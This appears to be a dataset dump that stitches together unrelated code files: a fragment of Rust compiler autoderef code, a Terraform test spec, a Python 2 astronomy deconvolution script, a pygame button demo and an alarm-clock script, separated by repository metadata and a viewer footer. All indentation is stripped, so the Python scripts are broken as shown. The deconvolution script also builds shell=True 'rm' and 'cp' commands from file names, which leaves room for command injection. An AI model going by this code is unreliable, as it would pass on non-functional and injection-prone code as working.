// opaque does not have a `Deref` item-bound.
if let &ty::Infer(ty::TyVar(vid)) = self.state.cur_ty.kind()
&& !self.infcx.has_opaques_with_sub_unified_hidden_type(vid)
{
return None;
}
// Otherwise, deref if type is derefable:
// NOTE: in the case of self.use_receiver_trait = true, you might think it would
// be better to skip this clause and use the Overloaded case only, since &T
// and &mut T implement Receiver. But built-in derefs apply equally to Receiver
// and Deref, and this has benefits for const and the emitted MIR.
let (kind, new_ty) =
if let Some(ty) = self.state.cur_ty.builtin_deref(self.include_raw_pointers) {
debug_assert_eq!(ty, self.infcx.resolve_vars_if_possible(ty));
// NOTE: we may still need to normalize the built-in deref in case
// we have some type like `&<Ty as Trait>::Assoc`, since users of
// autoderef expect this type to have been structurally normalized.
if self.infcx.next_trait_solver()
&& let ty::Alias(..) = ty.kind()
{
let (normalized_ty, obligations) = self.structurally_normalize_ty(ty)?;
self.state.obligations.extend(obligations);
(AutoderefKind::Builtin, normalized_ty)
} else {
(AutoderefKind::Builtin, ty)
}
} else if let Some(ty) = self.overloaded_deref_ty(self.state.cur_ty) {
// The overloaded deref check already normalizes the pointee type.
(AutoderefKind::Overloaded, ty)
} else {
return None;
};
self.state.steps.push((self.state.cur_ty, kind));
debug!(
"autoderef stage #{:?} is {:?} from {:?}",
self.step_count(),
new_ty,
(self.state.cur_ty, kind)
);
self.state.cur_ty = new_ty;
Some((self.state.cur_ty, self.step_count()))
}
}
impl<'a, 'tcx> Autoderef<'a, 'tcx> {
pub fn new(
infcx: &'a InferCtxt<'tcx>,
param_env: ty::ParamEnv<'tcx>,
body_def_id: LocalDefId,
span: Span,
base_ty: Ty<'tcx>,
) -> Self {
Autoderef {
infcx,
span,
body_id: body_def_id,
param_env,
state: AutoderefSnapshot {
steps: vec![],
cur_ty: infcx.resolve_vars_if_possible(base_ty),
obligations: PredicateObligations::new(),
at_start: true,
reached_recursion_limit: false,
},
include_raw_pointers: false,
use_receiver_trait: false,
silence_errors: false,
}
}
fn overloaded_deref_ty(&mut self, ty: Ty<'tcx>) -> Option<Ty<'tcx>> {
debug!("overloaded_deref_ty({:?})", ty);
let tcx = self.infcx.tcx;
if ty.references_error() {
return None;
}
// <ty as Deref>, or whatever the equivalent trait is that we've been asked to walk.
let (trait_def_id, trait_target_def_id) = if self.use_receiver_trait {
(tcx.lang_items().receiver_trait()?, tcx.lang_items().receiver_target()?)
} else {
(tcx.lang_items().deref_trait()?, tcx.lang_items().deref_target()?)
};
let trait_ref = ty::TraitRef::new(tcx, trait_def_id, [ty]);
let cause = traits::ObligationCause::misc(self.span, self.body_id);
let obligation = traits::Obligation::new(
tcx,
cause.clone(),
self.param_env,
ty::Binder::dummy(trait_ref),
);
// We detect whether the self type implements `Deref` before trying to
// structurally normalize. We use `predicate_may_hold_opaque_types_jank`
// to support not-yet-defined opaque types. It will succeed for `impl Deref`
// but fail for `impl OtherTrait`.
if !self.infcx.predicate_may_hold_opaque_types_jank(&obligation) {
debug!("overloaded_deref_ty: cannot match obligation");
return None;
}
let (normalized_ty, obligations) =
self.structurally_normalize_ty(Ty::new_projection(tcx, trait_target_def_id, [ty]))?;
debug!("overloaded_deref_ty({:?}) = ({:?}, {:?})", ty, normalized_ty, obligations);
self.state.obligations.extend(obligations);
Some(self.infcx.resolve_vars_if_possible(normalized_ty))
}
#[instrument(level = "debug", skip(self), ret)]
pub fn structurally_normalize_ty(
&self,
ty: Ty<'tcx>,
) -> Option<(Ty<'tcx>, PredicateObligations<'tcx>)> {
let ocx = ObligationCtxt::new(self.infcx);
let Ok(normalized_ty) = ocx.structurally_normalize_ty(
&traits::ObligationCause::misc(self.span, self.body_id),
self.param_env,
ty,
) else {
// We shouldn't have errors here in the old solver, except for
// evaluate/fulfill mismatches, but that's not a reason for an ICE.
return None;
};
let errors = ocx.try_evaluate_obligations();
if !errors.is_empty() {
if self.infcx.next_trait_solver() {
unreachable!();
}
// We shouldn't have errors here in the old solver, except for
// evaluate/fulfill mismatches, but that's not a reason for an ICE.
debug!(?errors, "encountered errors while fulfilling");
return None;
}
Some((normalized_ty, ocx.into_pending_obligations()))
}
/// Returns the final type we ended up with, which may be an unresolved
/// inference variable.
pub fn final_ty(&self) -> Ty<'tcx> {
self.state.cur_ty
}
pub fn step_count(&self) -> usize {
self.state.steps.len()
}
pub fn into_obligations(self) -> PredicateObligations<'tcx> {
self.state.obligations
}
pub fn current_obligations(&self) -> PredicateObligations<'tcx> {
self.state.obligations.clone()
}
pub fn steps(&self) -> &[(Ty<'tcx>, AutoderefKind)] {
&self.state.steps
}
pub fn span(&self) -> Span {
self.span
}
pub fn reached_recursion_limit(&self) -> bool {
self.state.reached_recursion_limit
}
/// also dereference through raw pointer types
/// e.g., assuming ptr_to_Foo is the type `*const Foo`
/// fcx.autoderef(span, ptr_to_Foo) => [*const Foo]
/// fcx.autoderef(span, ptr_to_Foo).include_raw_ptrs() => [*const Foo, Foo]
pub fn include_raw_pointers(mut self) -> Self {
self.include_raw_pointers = true;
self
}
/// Use `core::ops::Receiver` and `core::ops::Receiver::Target` as
/// the trait and associated type to iterate, instead of
/// `core::ops::Deref` and `core::ops::Deref::Target`
pub fn use_receiver_trait(mut self) -> Self {
self.use_receiver_trait = true;
self
}
pub fn silence_errors(mut self) -> Self {
self.silence_errors = true;
self
}
}
pub fn report_autoderef_recursion_limit_error<'tcx>(
tcx: TyCtxt<'tcx>,
span: Span,
ty: Ty<'tcx>,
) -> ErrorGuaranteed {
// We've reached the recursion limit, error gracefully.
let suggested_limit = match tcx.recursion_limit() {
Limit(0) => Limit(2),
limit => limit * 2,
};
tcx.dcx().emit_err(AutoDerefReachedRecursionLimit {
span,
ty,
suggested_limit,
crate_name: tcx.crate_name(LOCAL_CRATE),
})
} | rust | github | https://github.com/rust-lang/rust | compiler/rustc_hir_analysis/src/autoderef.rs |
{
"description": "tests adding and removing elements from a simple list",
"include_files": [],
"ignore_fields": {}
} | json | github | https://github.com/hashicorp/terraform | testing/equivalence-tests/tests/basic_list_update/spec.json |
#!/usr/bin/env python
'''
------------------------------------------------------------------------
Multicore Parallel Sub-Sampled Deconvolution
Deconvolve HST WFPC2/ACS images with spatially varying point spread function.
As each section of image is independent of the other sections, they can
easily be deconvolved in 'embarrassingly parallel' way. 256x256 image
sections are subsampled and deconvolved with constant PSF for that location
of CCD.
Usage : python deconvolve.py image psf nsub
image : degraded image to be deconvolved
psf : spatially varying point spread function
nsub : subsampling ( e.g. 2, 3 etc.)
[options]
--help : help
--version : program version
--verbose : display messages on stdout
--quiet : don't display messages on stdout
--outfile : output file name
--mode : multicore processing mode (process or pool)
--ncpus : number on processors to use for multicore processing
Output :
Sub-sampled deconvolved image
Author:
Navtej Singh
Organization:
Centre for Astronomy, National University of Ireland, Galway, Ireland
Version:
20 February 2012 1.0 Original version
------------------------------------------------------------------------
'''
# Load python modules to be used in the routine
import os, sys, math, subprocess, pyfits
import numpy as np
from optparse import OptionParser
from StringIO import StringIO
from ConfigParser import SafeConfigParser
# Check if multiprocesssing module is present
try:
import multiprocessing as mp
except:
print >> sys.stderr, 'Error: Python multiprocessing module not found. Exiting.'
sys.exit( -1 )
# Load required IRAF packages
def loadPackages():
iraf.stsdas(_doprint = 0)
iraf.stsdas.analysis(_doprint = 0)
iraf.stsdas.analysis.restore(_doprint = 0)
iraf.noao(_doprint = 0)
iraf.noao.artdata(_doprint = 0)
iraf.noao.digiphot(_doprint = 0)
iraf.noao.digiphot.daophot(_doprint = 0)
# Generate x,y pixel positions for psf generation
def getPsfCoords(dimx, dimy, radius = 64):
print >> sys.stdout, '\n Generating pixel positions for psf generation...'
xy = []
i = radius
while i < dimx:
j = radius
while j < dimy:
if i % 128 == 0 and j % 128 == 0:
xy.append((i, j))
j += radius
i += radius
return xy
# Generate image sections to be deconvolved. 256x256 sections are taken
def getChunks(dimx, dimy, radius = 64):
psfxy = getPsfCoords(dimx, dimy, radius)
print >> sys.stdout, '\n Generating image sections for deconvolution...'
in_coords = []
for value in psfxy:
mix1, mix2 = value[0] - 127, value[0] + 128
miy1, miy2 = value[1] - 127, value[1] + 128
if mix1 < 1 and mix1 > -1e+8:
mix1 = 1
else:
mix1 = mix1
if miy1 < 1 and miy1 > -1e+8:
miy1 = 1
else:
miy1 = miy1
if mix2 > dimx:
mix2 = dimx
else:
mix2 = mix2
if miy2 > dimy:
miy2 = dimy
else:
miy2 = miy2
in_coords.append((mix1, mix2, miy1, miy2))
return psfxy, in_coords
# Create input and output coordinates for pasting
def pasteCoords(imgxy, dimx, dimy, nsub):
sub_coords = []
for value in imgxy:
sub_coords.append((nsub * (value[0] - 1) + 1, nsub * value[1], nsub * (value[2] - 1) + 1, nsub * value[3]))
mem_coords, out_coords = [], []
# Generate MEM output coordinates
for value in sub_coords:
# X1 and X2 values
if value[0] != 1:
x1 = value[0] + 64 * nsub
else:
x1 = value[0]
if value[1] != (dimx * nsub):
x2 = value[1] - 64 * nsub
else:
x2 = value[1]
# Y1 and Y2 values
if value[2] != 1:
y1 = value[2] + 64 * nsub
else:
y1 = value[2]
if value[3] != (dimy * nsub):
y2 = value[3] - 64 * nsub
else:
y2 = value[3]
out_coords.append((x1, x2, y1, y2))
# Generate MEM coordinates for input deconvolved sections
for value in out_coords:
# X1 abd X2 coordinates
if value[0] != 1 and value[0] > -1e+8:
x1 = (64 * nsub) + 1
elif value[0] > -1e+8:
x1 = 1
else:
x1 = -1e+16
if value[1] != nsub * dimx and value[1] > -1e+8:
x2 = 192 * nsub
elif value[1] > -1e+8:
x2 = 160 * nsub
else:
x2 = -1e+16
# Y1 and Y2 coordinates
if value[2] != 1 and value[2] > -1e+8:
y1 = ( 64 * nsub ) + 1
elif value[2] > -1e+8:
y1 = 1
else:
y1 = -1e+16
if value[3] != nsub * dimx and value[3] > -1e+8:
y2 = 192 * nsub
elif value[3] > -1e+8:
y2 = 160 * nsub
else:
y2 = -1e+16
mem_coords.append((x1, x2, y1, y2))
return mem_coords, out_coords
# Function to copy FITS image or image section (uses pyfits to handle FITS files)
def imcopy(infile, outfile, dim = None):
print >> sys.stdout, 'Copying ', infile, ' ----> ', outfile
if len(outfile.split('[')) == 1:
subprocess.call('cp ' + infile + ' ' + outfile, shell = True)
else:
if not dim:
print >> sys.stderr, 'Error : for image section copying, dim parameter cannot be None. Exiting.'
sys.exit(-1)
header = pyfits.getheader(infile)
output = np.zeros((dim, dim), dtype = np.float32)
try:
f1 = pyfits.open(infile)
except:
print >> sys.stderr, 'Error : Not able to open ', infile, '. Exiting.'
sys.exit(-1)
x1, x2 = int(outfile.split('[')[1].replace(']', '').split(',')[0].split(':')[0]), int(outfile.split('[')[1].replace(']', '').split(',')[0].split(':')[1])
y1, y2 = int(outfile.split('[')[1].replace(']', '').split(',')[1].split(':')[0]), int(outfile.split('[')[1].replace(']', '').split(',')[1].split(':')[1])
output[x1:x2, y1:y2] = f1[0].data
outfile = outfile.split('[')[0]
subprocess.call('rm -f ' + outfile, shell = True)
pyfits.writeto(outfile, output, header = header)
return outfile
# Generate psf image from psf lookup tables
def seepsf(psf, x, y, dim):
seepsfimg_t = psf.replace('.fits', '_seepsf_' + str(x) + '_' + str(y) + 't.fits')
subprocess.call('rm -f ' + seepsfimg_t, shell = True)
print >> sys.stdout, '\n Generating psf image : ', seepsfimg_t
iraf.seepsf(psf, seepsfimg_t, dimension = dim, x = x, y = y)
n = math.log(dim, 2)
if math.ceil(n) != math.floor(n):
psfdim = int(2 ** (math.floor(n) + 1))
seepsfimg = psf.replace('.fits', '_seepsf_' + str(x) + '_' + str(y) + '.fits')
# Using imcopy method instead of IRAF imcopy function as IRAF imcopy task in failing in parallel mode
if (psfdim - dim) % 2 == 0:
cut = (psfdim - dim) / 2
imcopy(seepsfimg_t, seepsfimg + '[' + str(cut) + ':' + str(psfdim - cut) + ',' + str(cut) + ':' + str(psfdim - cut) + ']', psfdim)
else:
cut1 = (psfdim - dim) / 2
cut2 = (psfdim - dim) - cut1
imcopy(seepsfimg_t, seepsfimg + '[' + str(cut2) + ':' + str(psfdim - cut1) + ',' + str(cut2) + ':' + str(psfdim - cut1) + ']', psfdim)
else:
seepsfimg = psf.replace('.fits', '_seepsf_' + str(x) + '_' + str(y) + '.fits')
subprocess.call('rm -f ' + seepsfimg , shell = True)
subprocess.call('cp ' + seepsfimg_t + ' ' + seepsfimg, shell = True)
# Cleanup - remove temprary seepsf files
subprocess.call('rm -f ' + seepsfimg_t, shell = True)
return seepsfimg
# Create output blank image
def createBlankImage(image, outfile = None, nsub = 1):
if not outfile:
if len(image.rsplit('[', 1)) > 1:
outfile = image.rsplit('[', 1)[0].replace('.fits', '.' + image.rsplit('[', 1)[1].replace(']', '') + '_mem.fits')
else:
outfile = image.rsplit('[', 1)[0].replace('.fits', '.mem.1.fits')
subprocess.call('rm -f ' + outfile, shell = True)
iraf.blkrep(image, outfile, b1 = nsub, b2 = nsub)
iraf.imreplace(outfile, 0, upper = 'INDEF', lower = 'INDEF')
return outfile
# Deconvolve image section using Maximum Entropy Method
def mem(image, psf, psfxy, imgxy, psfrad, nsub):
# Load IRAF packages
loadPackages()
# Generate psf image for the image section
dim = 2 * int(psfrad) * nsub + 1
# Create psf image from psf tables
psfimg = seepsf(psf, psfxy[0], psfxy[1], dim)
outimg = image.rsplit('[', 1)[0].replace('.fits', '.mem_' + str(psfxy[0]) + '_' + str(psfxy[1]) + '.fits')
subprocess.call('rm -f ' + outimg, shell = True)
# Read MEM deconvolution parameters from configuration file
parser = SafeConfigParser()
if not parser.read('deconvolve.cfg'):
print >> sys.stderr, 'Error: Not able to open deconvolve.cfg configuraton file. Exiting.'
sys.exit(-1)
# Deconvolve the image section
iraf.mem(image + "[" + str(imgxy[0]) + ":" + str(imgxy[1]) + "," + str(imgxy[2]) + ":" + str(imgxy[3]) + "]", psf = psfimg, model = '', output = outimg, noise = parser.get('mem', 'noise'), adu = parser.get('mem', 'adu'), nsub = nsub, poisson = parser.get('mem', 'poisson'), tp = parser.get('mem', 'tp'), blksum = parser.get('mem', 'blksum'), guess = parser.get('mem', 'guess'), icf = parser.get('mem', 'icf'), hidden = parser.get('mem', 'hidden'), aim = parser.get('mem', 'aim'), maxiter = parser.get('mem', 'maxiter'), message = parser.get('mem', 'message'), m_update = parser.get('mem', 'm_update'), method = parser.get('mem', 'method'))
# Clean up - remove seepsf file
subprocess.call('rm -f ' + psfimg, shell = True)
return outimg
# Combine overlapping deconvolved image secitons to generate final deconvolved image
def paste(image, mem_imgs, imgxy, dimx, dimy, nsub, outfile):
memimg = createBlankImage(image, outfile, nsub)
# Determine coordinates for pasting the image
mem_coords, out_coords = pasteCoords(imgxy, dimx, dimy, nsub)
# Paste image sections to create the final deconvolved image
for i in range(len(mem_coords)):
iraf.imcopy(mem_imgs[i] + '[' + str(mem_coords[i][0]) + ':' + str(mem_coords[i][1]) + ',' + str(mem_coords[i][2]) + ':' + str(mem_coords[i][3]) + ']', memimg + '[' + str(out_coords[i][0]) + ':' + str(out_coords[i][1]) + ',' + str(out_coords[i][2]) + ':' + str(out_coords[i][3]) + ']')
# Clean up - remove the MEM deconvolved image sections
for i in range(len(mem_coords)):
subprocess.call('rm -f ' + mem_imgs[i], shell = True)
return memimg
# Multicore process/queue worker function
def process_worker(s_q, r_q):
for value in iter(s_q.get, 'STOP'):
result = mem(value[1], value[2], value[3], value[4], value[5], value[6])
r_q.put((value[0], result))
# Multicore pool/map worker function
def pool_worker(indata):
cnt, image, psf, psfxy, imgxy, psfrad, nsub = indata
result = mem(image, psf, psfxy, imgxy, psfrad, nsub)
return (cnt, result)
# Main function of deconvolution routine
def deconvolve(image, psf, nsub, outfile = None, mode = 'process', ncpus = None):
# Determine image dimensions
iraf.imgets( image, 'i_naxis1')
dimx = int(iraf.imgets.value)
iraf.imgets(image, 'i_naxis2')
dimy = int(iraf.imgets.value)
# Determine PSF radius
iraf.imgets(psf, 'psfrad')
psfrad = float(iraf.imgets.value)
# Calculate image section coordinates
psfxy, imgxy = getChunks(dimx, dimy)
# Generate dataset chunks to be processed
chunks = []
for i in range(len(psfxy)):
chunks.append((i, image, psf, psfxy[i], imgxy[i], psfrad, nsub))
# Determine number of processors or get the value from user
if ncpus:
n_cpus = int(ncpus)
else:
n_cpus = mp.cpu_count()
# Based on multicore mode (process or pool), follow different paths
if mode == 'pool':
pool = mp.Pool(n_cpus)
result = pool.map(pool_worker, chunks)
else:
# Create send and receive queues
send_q = mp.Queue()
recv_q = mp.Queue()
# Start processes equal to number of processors
for i in range(n_cpus):
mp.Process(target = process_worker, args = (send_q, recv_q)).start()
# Send data to send queue
for chunk in chunks:
send_q.put(chunk)
# Receive result in receive queue
result = []
for i in range(len(chunks)):
result.append(recv_q.get())
# Stop all the running processes
for i in range(n_cpus):
send_q.put('STOP')
# Sort the result list to have right series for pasting
result = sorted(result, key = lambda result: result[0])
# Generate final deconvolved image by pasting image sections
mem_imgs = []
for value in result:
mem_imgs.append(value[1])
deconv_img = paste(image, mem_imgs, imgxy, dimx, dimy, nsub, outfile)
print >> sys.stdout, '\n Final Deconvolved Image : ', deconv_img, '\n'
# Input validation funtion, calls main deconvolution routine
def main(image, psf, nsub, outfile = None, mode = None, ncpus = None):
if not os.path.exists(image.rsplit( '[', 1 )[0]):
print >> sys.stderr, 'Error: Image ', image, ' does not exist. Exiting.'
sys.exit(-1)
# If multi-extension file, check if the user entered the extension or not
if len(pyfits.open(image.rsplit('[', 1)[0])) > 1 and len(image.rsplit('[', 1)) == 1:
print >> sys.stdout, 'Error : Multi-extension FITS image. Please provide image extension. Exiting.'
sys.exit(-1)
if not os.path.exists(psf):
print >> sys.stderr, 'Error: PSF file ', psf, ' does not exist. Exiting.'
sys.exit(-1)
deconvolve(image, psf, int( nsub ), outfile, mode, ncpus)
# Entry point for deconvolution utility
if __name__ == '__main__':
usage = "Usage: python %prog [options] image psf nsub"
description = "Description. Utility to deconvolve image with spatially varying psf in multiprocessing mode.\nMaximum entropy method is used with subsampling (nsub should be greater than 1)."
parser = OptionParser(usage = usage, version = "%prog 1.0", description = description)
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default = False,
help = "print result messages to stdout"
)
parser.add_option("-q", "--quiet",
action="store_false", dest="verbose", default = True,
help = "don't print result messages to stdout"
)
parser.add_option("-o", "--outfile", dest = "filename",
action='store', metavar="FILE", help = "output file name"
)
parser.add_option("-m", "--mode", dest = "mode", metavar="MODE",
action="store", help = "multiprocessing mode (pool or process) [default is pool]",
choices=['process', 'pool'], default = 'pool'
)
parser.add_option("-n", "--ncpus", dest = "ncpus", metavar="NCPUS",
action="store", help = "number of cpus (cores) for processing"
)
(options, args) = parser.parse_args()
# Check for number of input arguments
if len(args) != 3:
parser.error("Incorrect number of arguments. Check help for more details.")
if args[2] <= 1:
parser.error("Subsampling should be greater than 1. Check help for more details.")
print >> sys.stdout, '\n Starting processing...'
# Check verbosity
if not options.verbose:
output = StringIO()
old_stdout = sys.stdout
sys.stdout = output
# Check if pyraf module is installed
try:
from pyraf import iraf
except:
print >> sys.stderr, 'Error: Python module pyraf not found. Exiting.'
sys.exit(-1)
main(args[0], args[1], args[2], options.filename, options.mode, options.ncpus)
# Reset verbosity
if not options.verbose:
sys.stdout = old_stdout
print >> sys.stdout, '\n Process completed successfully.' | unknown | codeparrot/codeparrot-clean | ||
import pygame, sys
from pygame.locals import *
TIMER = 30
SCREEN_X = 200
SCREEN_Y = 200
screen = pygame.display.set_mode((SCREEN_X, SCREEN_Y))
clock = pygame.time.Clock() #tick-tock
ending = button1 = button2 = False
corner1 = (28,18) #Top Left corner of button 1
corner2 = (56,18) #Top Left corner of button 2
image_length = 100 #length of the buttons
image_height = 100 #height of the buttons
counter = 0
#Main Loop:
while ending==False:
counter+=1
clock.tick(TIMER)
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
ending=True # Time to leave
print("Game Stopped Early by user")
elif event.type == MOUSEBUTTONDOWN:
if event.button == 1:
mouse_x, mouse_y = event.pos
if (mouse_x >= corner1[0]) and (mouse_x <= corner1[0]+image_length) and (mouse_y >= corner1[1]) and (mouse_y <= corner1[1]+image_height):
print ("Button one is selected")
button1=True
button2=False
elif (mouse_x >= corner2[0]) and (mouse_x <= corner2[0]+image_length) and (mouse_y >= corner2[1]) and (mouse_y <= corner2[1]+image_height):
print ("Button two is selected")
button1=False
button2=True
else:
print ("That's not a button")
button1=False
button2=False
if counter == TIMER: #prints the statements once a second
counter=0
if button1==True:
print ("Button one is currently selected")
elif button2==True:
print ("Button two is currently selected")
else:
print ("No buttons currently selected") | unknown | codeparrot/codeparrot-clean | ||
"""
Alarm Clock - A simple clock where it plays a sound after
X number of minutes/seconds or at a particular time.
Dependencies:
pyglet
pip install pyglet
"""
import time
import winsound
import pyglet
def play(hh, mm):
not_alarmed = 1
while(not_alarmed):
cur_time = list(time.localtime()) # get the time right now
hour = cur_time[3] # find the hour
minute = cur_time[4] # and the minute
if hour == hh and minute == mm:
song = pyglet.media.load('bin/sound.wav')
song.play() # play the sound
pyglet.app.run()
not_alarmed = 0 # stop the loop
if __name__ == '__main__':
print """
1. Play sound after X minutes
2. Play sound at an exact time
"""
choice = input('What do you want to do? ')
if choice == 1:
mins = input('How many minutes from now? ')
hh_from_now = mins / 60 # if minutes > 60, this will adjust the hours
mm_from_now = mins % 60 # and then the minutes
cur_time = list(time.localtime()) # get the time right now
hour = cur_time[3] # find the current hour
minute = cur_time[4] # and the current minute
hh = (hour + hh_from_now+(minute+mm_from_now)/60) % 24 # cycle through the clock if hh > 24
mm = (minute + mm_from_now) % 60 # cycle through the clock if mm > 60
play(hh, mm)
elif choice == 2:
hh = input('What hour do you want to wake up (0-23)? ')
mm = input('What minute do you want to wake up (0-59)? ')
play(hh, mm) | unknown | codeparrot/codeparrot-clean |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.